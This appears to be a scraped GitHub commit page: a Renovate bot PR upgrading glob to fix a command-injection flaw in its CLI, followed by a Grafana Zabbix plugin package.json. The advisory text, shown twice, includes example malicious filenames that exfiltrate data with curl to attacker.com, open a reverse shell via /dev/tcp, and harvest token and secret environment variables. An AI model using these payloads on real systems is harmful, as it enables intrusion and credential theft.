5790b9a68d
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [glob](https://redirect.github.com/isaacs/node-glob) | [`^10.2.7` ->
`^11.0.0`](https://renovatebot.com/diffs/npm/glob/10.4.5/11.1.0) |
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
### GitHub Vulnerability Alerts
####
[CVE-2025-64756](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
# Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
**Environment Variable Harvesting:**
```bash
# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
---
### glob CLI: Command injection via -c/--cmd executes matches with
shell:true
[CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756) /
[GHSA-5j98-mcp5-4vw2](https://redirect.github.com/advisories/GHSA-5j98-mcp5-4vw2)
<details>
<summary>More information</summary>
#### Details
##### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
##### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
##### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
##### Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
##### Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
##### Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
##### Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
**Environment Variable Harvesting:**
```bash
##### Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
##### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
##### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
##### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`
#### References
-
[https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
-
[https://nvd.nist.gov/vuln/detail/CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756)
-
[47473c046b)
-
[https://github.com/isaacs/node-glob](https://redirect.github.com/isaacs/node-glob)
This data is provided by
[OSV](https://osv.dev/vulnerability/GHSA-5j98-mcp5-4vw2) and the [GitHub
Advisory Database](https://redirect.github.com/github/advisory-database)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>
---
### Release Notes
<details>
<summary>isaacs/node-glob (glob)</summary>
###
[`v11.1.0`](https://redirect.github.com/isaacs/node-glob/compare/v11.0.3...v11.1.0)
[Compare
Source](https://redirect.github.com/isaacs/node-glob/compare/v11.0.3...v11.1.0)
###
[`v11.0.3`](https://redirect.github.com/isaacs/node-glob/compare/v11.0.2...v11.0.3)
[Compare
Source](https://redirect.github.com/isaacs/node-glob/compare/v11.0.2...v11.0.3)
###
[`v11.0.2`](https://redirect.github.com/isaacs/node-glob/compare/v11.0.1...v11.0.2)
[Compare
Source](https://redirect.github.com/isaacs/node-glob/compare/v11.0.1...v11.0.2)
###
[`v11.0.1`](https://redirect.github.com/isaacs/node-glob/compare/v11.0.0...v11.0.1)
[Compare
Source](https://redirect.github.com/isaacs/node-glob/compare/v11.0.0...v11.0.1)
###
[`v11.0.0`](https://redirect.github.com/isaacs/node-glob/compare/v10.4.5...v11.0.0)
[Compare
Source](https://redirect.github.com/isaacs/node-glob/compare/v10.5.0...v11.0.0)
###
[`v10.5.0`](https://redirect.github.com/isaacs/node-glob/compare/v10.4.5...v10.5.0)
[Compare
Source](https://redirect.github.com/isaacs/node-glob/compare/v10.4.5...v10.5.0)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).
🚦 **Automerge**: Enabled.
♻ **Rebasing**: Whenever PR is behind base branch, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
## Need help?
You can ask for more help in the following Slack channel:
#proj-renovate-self-hosted. In that channel you can also find ADR and
FAQ docs in the Resources section.
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzguNSIsInVwZGF0ZWRJblZlciI6IjQxLjEzOC41IiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJhdXRvbWVyZ2Utc2VjdXJpdHktdXBkYXRlIiwic2V2ZXJpdHk6SElHSCJdfQ==-->
Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com>
Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com>
117 lines
4.0 KiB
JSON
117 lines
4.0 KiB
JSON
{
|
|
"name": "grafana-zabbix",
|
|
"version": "6.0.3",
|
|
"description": "Zabbix plugin for Grafana",
|
|
"homepage": "http://grafana-zabbix.org",
|
|
"bugs": {
|
|
"url": "https://github.com/grafana/grafana-zabbix/issues"
|
|
},
|
|
"repository": {
|
|
"type": "git",
|
|
"url": "git+https://github.com/grafana/grafana-zabbix.git"
|
|
},
|
|
"license": "Apache-2.0",
|
|
"author": "Grafana Labs",
|
|
"scripts": {
|
|
"build": "webpack -c ./webpack.config.ts --env production",
|
|
"dev": "webpack -w -c ./webpack.config.ts --env development",
|
|
"e2e": "playwright test",
|
|
"lint": "eslint --cache --ignore-path ./.gitignore --ext .js,.jsx,.ts,.tsx .",
|
|
"lint:fix": "yarn run lint --fix && prettier --write --list-different .",
|
|
"server": "docker compose up --build",
|
|
"server:down": "docker compose --file ./devenv/default/docker-compose.yml down",
|
|
"server:stop": "docker compose --file ./devenv/default/docker-compose.yml stop",
|
|
"sign": "npx --yes @grafana/sign-plugin@latest",
|
|
"spellcheck": "cspell -c cspell.config.json \"**/*.{ts,tsx,js,go,md,mdx,yml,yaml,json,scss,css}\"",
|
|
"test": "jest --watch --onlyChanged",
|
|
"test:ci": "jest --passWithNoTests --maxWorkers 4",
|
|
"typecheck": "tsc --noEmit"
|
|
},
|
|
"dependencies": {
|
|
"@emotion/css": "11.10.6",
|
|
"@grafana/data": "^12.1.0",
|
|
"@grafana/i18n": "^12.1.0",
|
|
"@grafana/plugin-ui": "^0.10.10",
|
|
"@grafana/runtime": "^12.1.0",
|
|
"@grafana/schema": "^12.1.0",
|
|
"@grafana/ui": "^12.1.0",
|
|
"react": "18.2.0",
|
|
"react-dom": "18.2.0",
|
|
"react-router-dom": "^6.22.0",
|
|
"rxjs": "7.8.2",
|
|
"tslib": "2.5.3"
|
|
},
|
|
"devDependencies": {
|
|
"@babel/core": "^7.21.4",
|
|
"@changesets/cli": "^2.29.7",
|
|
"@grafana/e2e-selectors": "12.1.0",
|
|
"@grafana/eslint-config": "^8.0.0",
|
|
"@grafana/plugin-e2e": "^2.1.12",
|
|
"@grafana/tsconfig": "^2.0.0",
|
|
"@playwright/test": "^1.52.0",
|
|
"@stylistic/eslint-plugin-ts": "^2.9.0",
|
|
"@swc/core": "^1.3.90",
|
|
"@swc/helpers": "^0.5.0",
|
|
"@swc/jest": "^0.2.26",
|
|
"@testing-library/jest-dom": "6.1.4",
|
|
"@testing-library/react": "14.0.0",
|
|
"@types/glob": "^8.0.0",
|
|
"@types/grafana": "github:CorpGlory/types-grafana",
|
|
"@types/jest": "^29.5.0",
|
|
"@types/lodash": "^4.14.194",
|
|
"@types/node": "^20.8.7",
|
|
"@types/react": "^18.2.25",
|
|
"@types/react-router-dom": "^5.2.0",
|
|
"@types/testing-library__jest-dom": "5.14.8",
|
|
"@typescript-eslint/eslint-plugin": "^8.3.0",
|
|
"@typescript-eslint/parser": "^8.3.0",
|
|
"autoprefixer": "10.4.7",
|
|
"clean-webpack-plugin": "^0.1.19",
|
|
"copy-webpack-plugin": "^11.0.0",
|
|
"cspell": "6.13.3",
|
|
"css-loader": "^6.7.3",
|
|
"eslint": "8.57.1",
|
|
"eslint-config-prettier": "^8.8.0",
|
|
"eslint-plugin-deprecation": "^2.0.0",
|
|
"eslint-plugin-jsdoc": "^46.8.2",
|
|
"eslint-plugin-prettier": "^5.0.0",
|
|
"eslint-plugin-react": "^7.33.2",
|
|
"eslint-plugin-react-hooks": "^4.6.0",
|
|
"eslint-webpack-plugin": "^4.0.1",
|
|
"fork-ts-checker-webpack-plugin": "^8.0.0",
|
|
"glob": "^11.0.0",
|
|
"identity-obj-proxy": "3.0.0",
|
|
"imports-loader": "^5.0.0",
|
|
"jest": "^29.5.0",
|
|
"jest-environment-jsdom": "^29.5.0",
|
|
"lodash": "4.17.21",
|
|
"mini-css-extract-plugin": "2.6.1",
|
|
"moment": "2.29.4",
|
|
"postcss": "8.4.31",
|
|
"postcss-loader": "7.0.1",
|
|
"postcss-reporter": "7.0.5",
|
|
"postcss-scss": "4.0.4",
|
|
"prettier": "^3.0.3",
|
|
"prop-types": "15.7.2",
|
|
"react-table-6": "6.11.0",
|
|
"react-use": "17.4.0",
|
|
"replace-in-file-webpack-plugin": "^1.0.6",
|
|
"sass": "1.63.2",
|
|
"sass-loader": "13.3.1",
|
|
"semver": "^7.6.3",
|
|
"style-loader": "3.3.3",
|
|
"swc-loader": "^0.2.3",
|
|
"terser-webpack-plugin": "^5.3.10",
|
|
"ts-node": "^10.9.2",
|
|
"tsconfig-paths": "^4.2.0",
|
|
"typescript": "5.5.4",
|
|
"webpack": "^5.94.0",
|
|
"webpack-cli": "^5.1.4",
|
|
"webpack-livereload-plugin": "^3.0.2",
|
|
"webpack-remove-empty-scripts": "^1.0.1",
|
|
"webpack-subresource-integrity": "^5.1.0",
|
|
"webpack-virtual-modules": "^0.6.2"
|
|
},
|
|
"packageManager": "yarn@4.9.4"
|
|
}
|